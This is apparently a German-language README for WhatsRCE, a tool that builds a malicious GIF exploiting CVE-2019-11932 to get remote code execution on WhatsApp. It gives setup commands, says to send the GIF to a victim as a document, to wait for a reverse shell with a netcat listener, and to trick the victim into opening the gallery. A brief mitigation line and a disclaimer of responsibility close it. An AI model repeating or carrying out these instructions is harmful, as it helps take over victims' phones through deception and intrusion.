WhatsRCE
Dies ist ein automatisch generiertes Payload für CVE-2019-11932 (WhatsApp Remote-Code-Ausführung)
- Automatische Installation von GCC (harmloser Befehl, Sie können sehen, dass dies Open-Source ist)
- Speichern in .GIF-Datei
Wie benutzt man ?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Wie bekomme ich eine Shell ?
- Sie senden die .GIF-Datei einfach an das Opfer ALS DOKUMENT, NICHT ALS BILDER
- Und stellen Sie nc / netcat auf den Port ein, den Sie in den WhatsRCE-Tools eingestellt haben {nc -lnvp your_port}
- Sie können den Social-Engineering-Angriff nutzen, damit Opfer dazu verleitet werden, diesen Exploit auszuführen
- Bitten Sie das Opfer, die Galerie über WhatsApp zu öffnen, und sagen Sie dem Opfer, beliebige Fotos zu senden (nicht nötig, es genügt, zur Galerie zu gehen, kein Problem). Danach erhalten Sie einige Sekunden später eine Shell-Verbindung vom Opfer.
oder schauen Sie sich einfach dieses Video an
DEMO-VIDEO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
falls der obige Link nicht zugänglich ist
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Wie kann man diesen Angriff vermeiden?
- Aktualisieren Sie Ihr WhatsApp auf die neueste Version (behoben in Version 2.19.244)
- Wie man Dateien (einschließlich Audiodateien, Bilder und andere) von unbekannten Personen empfängt
Dies dient nur zu Lernzwecken, Konsequenzen etc. Wenn Sie es für eine Straftat verwenden, übernehme ich keine Verantwortung!